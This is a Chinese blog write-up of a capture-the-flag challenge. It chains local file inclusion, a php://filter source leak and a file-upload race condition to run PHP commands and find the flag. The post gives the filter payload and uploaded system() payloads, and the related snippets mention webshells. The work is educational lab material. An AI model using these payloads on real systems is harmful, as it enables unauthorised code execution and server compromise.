(文件上传,文件包含,条件竞争)-题

于 2024-04-16 00:06:19 发布
阅读量478 收藏 2
点赞数 17
文章标签: 网络 安全 学习方法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/viki101/article/details/137798889
版权

通过访问页面,得到上传点。

查看源代码,得到存在include.php页面。

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     <title>upload_it</title>
     <h1>随便传!</h1>
     <hr>
</head>
<form id="upload-form" action="upload.php" method="post" enctype="multipart/form-data" >
<input type="file" id="upload" name="file" /> <br />
<input type="submit" value="Upload" />
</form>
	<!-- include.php -->
</html>

这里我上传了各类文件,发现都跳转到upload.php 页面,其显示文件上传类型格式不正确,即将删除,删除成功。

查看网页源代码后,只显示了前端文字,无其他内容。故此想到了此类型上传文件为后端验证。借此可以利用文件包含漏洞来显示upload.php后端验证代码。

访问include.php页面,

有include()函数,并且有post请求参数'ncut'。burpsuite拦截抓包,利用php://filter/ 协议来读取文件内容。

抓到的包为get请求,

需要转换为post请求,并发送给Repeater,得到其后端验证base64编码。

ncut=php://filter/read=convert.base64-encode/resource=upload.php

 

 解码得

<?php
//关闭错误报告
    error_reporting(0);  
    $allowtype = array("");
    $size = 10000000;

//定义文件上传路径,文件将被上传到服务器的 ./upload/ 目录下。

    $path = "./upload/";

    $filename = $_FILES['file']['name'];

//使用 is_uploaded_file() 函数检查文件是否已成功上传到临时目录
    if (is_uploaded_file($_FILES['file']['tmp_name'])){
        if (!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
            exit();
        } 
        else
            {
                if (strpos(file_get_contents($_FILES['file']['tmp_name']),'<?php')!=false){
                die("监测到非法内容`<?php`!");
            }
        } 
    } else {
        exit();
    }

    $newfile = $path.$filename;

    if ($_FILES['file']['error'] > 0){
        unlink($newfile);
        exit();                                                                                                                                                                                                   
    }                                                                                                                                                                                                             
                                                                                                                                                                                                                  
    $ext = array_pop(explode(".",$_FILES['file']['name']));                                                                                                                                                       
    if (!in_array($ext,$allowtype)){                                                                                                                                                                              
        echo "文件格式不符合要求,即将删除!\n";                                                                                                                                                                  
        unlink($newfile);                                                                                                                                                                                         
        echo "删除成功!\n";                                                                                                                                                                                      
        exit();                                                                                                                                                                                                   
    }
?>

总体意思为先保存文件,然后检查是否含有<?php内容,最后删除。这里就用到了条件竞争,利用保存到删除的时间差,去访问我们上传的文件,从而导致代码执行。这里运用bp intruder 模块,不断上传,和利用文件包含访问上传的文件。

这里我上传的是2.php,且内容为<?php phpinfo();?>

这里设置payload type 为 Null payloads  Generate设置9999,小一点也行。

另一个也同样设置。 这里注意的是必须为post请求。

开始爆破。看到返回长度不同,说明代码被成功解析。

故此修改上传文件代码,发现无可用信息。

<?php system('ls');?>

 

故cd到根目录下发现flag。

<?php system('cd /&&ls')>

 

viki101
关注
  • 17
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
第十三节 文件上传-竞争条件-01
09-15
"文件上传-竞争条件" 文件上传是 Web 应用程序中一个常见的功能,但是如果没有正确地实现文件上传功能,可能会导致严重的安全竞争条件(Race Condition)是文件上传中的一种常见的漏洞,攻击者可以利用这个...
web-渗透-文件上传漏洞专靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
实验室:通过竞争条件上传 Web shell
Loser5的博客
03-22 540
利用文件上传竞争条件
文件上传-竞争条件
一米八多的瑞兹的博客
03-12 787
1. 文件上传过程介绍 文件上传过程: 服务器获取文件>>>保存上传临时文件>>>重命名移动临时文件 2. 竞争条件原理介绍 网站逻辑: 1、网站允许上传任意文件,然后检查上传文件是否包含Webshell,如果包含删除该文件。 2、网站允许上传任意文件,但是如果不是指定类型,那么使用unlink删除文件。 在删除之前访问上传的php文件,从而执行上传文件中的php代码。 例如:上传文件代码如下 <?php fputs(fopen('shell.php','w'),
iwebsec靶场文件上传漏洞-竞争条件文件上传
qq_56041380的博客
03-30 729
竞争条件是指多个线程在没有进行锁操作或者同步操作的情况下同时访问同一个共享代码、变量、文件等,运行的结果依赖于不同线程访问数据的顺序。源码分析。
文件上传条件竞争
qq_53829555的博客
09-21 4691
随着科技不断的发展,网络安全成为了一个大家都要注意与关心的话,今天小编就带大家了解与复现一下文件上传漏洞中的条件竞争漏洞
条件竞争文件上传
weixin_46239998的博客
01-07 886
一、条件竞争介绍条件竞争,在程序员日常的Web应用开发中,通常不如其他漏洞受到的关注度高。因为普遍的共识是,条件竞争是不可靠的,大多数时候只能靠代码审计来识别发现,而依赖现有的工具或技术很难在黑盒灰盒中识别并进行攻击。即便该漏洞很难被发现,也仍然有很多企业曾被曝出相关漏洞,例如星巴克咖啡、小密圈的App 产品等。今天要讲解的条件竞争漏洞仅限于Web应用之中。
冒泡云盘-网盘管理(axure原型文件).rar
最新发布
05-09
这个压缩包内包含了多个页面模板和组件,涵盖了用户注册、登录、文件上传下载、文件管理、分享链接以及账户设置等核心功能,旨在帮助开发团队快速构建出一个高效、易用的在线文件存储和共享平台。在当前的数字化时代...
文件上传共计CRT
12-04
有流行CRTTelnet客户机的所有特点,包括:自动注册、对不同主机保持不同的特性、打印功能、颜色设置、可变屏幕尺寸、用户定义的键位图和优良的VT100,VT102,VT220和ANSI竞争.能从命令行中运行或从浏览器中运行.其它特点...
freshers-portal-site:该网站可帮助NITP的新生向学生提供与学习相关的文件
05-23
为NitP的学生创建一个网站,供他们阅读由高年级和校友撰写的博客,以进行竞争编码,诸如此类的布置……。除此之外,我们还可以为学生提供上一年部门的明智问和说明。 目标: 帮助学生学习。 帮助学生更多地了解...
文件上传漏洞之条件竞争
柠檬i的博客
08-28 1397
这段代码逻辑是文件上传后先保存文件,然后判断是否符合规则,符合的话改文件名,不符合的话删除文件。 在多线程环境中,可能会存在文件还未来得及删除,我们便访问到该文件,可以以此为切入点执行php语句。
文件上传-条件竞争-DoraBox
W小哥
01-06 3966
一、条件竞争的概念 发生在多个线程同时访问同一个共享代码、变量、文件等没有进行锁操作或者同步操作的场景中 二、文件上传-条件竞争源码 三、文件上传-条件竞争漏洞使用方法 我门可以猜测源码,这里应该是我们成功上传了php文件但后端在短时间内将其删除了,所以我们要抢到在它删除之前访问文件,就如我们打开文件的时候去删除它,会提示文件文件已打开一样,这样从而防止文件被删除。 利用木马文件: 上传PHP木...
PHP文件上传条件竞争(其一)
Elite的博客
04-07 1970
在某些文件上传情境中,后端代码会先保存我们所上传的文件,然后再检查我们上传的文件是否含有风险,如果有的话会被删除,这是我们就需要和删除函数(如unlink()函数)来进行时间与线程上的竞争,争取在删除文件之前访问到该文件,达到攻击效果。
文件包含(session条件竞争
qq_64318364的博客
12-04 585
session条件竞争,简单复现
PHP文件包含漏洞(利用phpinfo)复现&&文件上传(条件竞争)
sinat_61654365的博客
01-11 1603
在 PHP 环境下,如果网站存在本地文件包含漏洞,但是却无法找到想要包含的文件,也无法生成和上传文件,是否能够获得 WebShell 呢?这里有一个技巧,前提是网站需要有一个 phpinf 页面,就可以通过条件竞争来包含缓存文件获取 WebShell了。这个技巧实际上融合了PHIP 文件包含信息泄露条件竞争这三种漏洞,下面简述一下这种技巧的原理。
文件包含&条件竞争
qq_63267612的博客
06-26 315
session.upload_progress 与open_basedir、allow_url_fopen、allow_url_include等PHP配置一样,session.upload_progress也是PHP的一个功能,同样可以在php.ini中设置相关属性。其中最重要的几个设置如下:session.upload_progress.enabled可以控制是否开启session.upload_progress功能 session.upload_progress.cleanup可以控制是否在上传之后删除
文件上传漏洞之——利用条件竞争绕过
wsnbbz的博客
03-04 4620
条件竞争漏洞 . 介绍 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计的不合理时,将会导致此类问的发生 原理 上传文件源代码里没有校验上传的文件,文件直接上传上传成功后才进行判断:如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除 由于服务器并发处理(同时)多个请求,假如a用户上传了木马文件,由于代码执行需要...
如何 防御文件上传漏洞,具体方法
11-09
文件上传漏洞的防御主要从以下几个方面考虑: 1. 前端检测:在前端用JS脚本做检测,如检测文件后缀名等。 2. 服务器端检测: ① MIME类型检测:比如GIF图片MIME为image/gif,CSS文件的MIME为text/css。 ② 文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

viki101

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值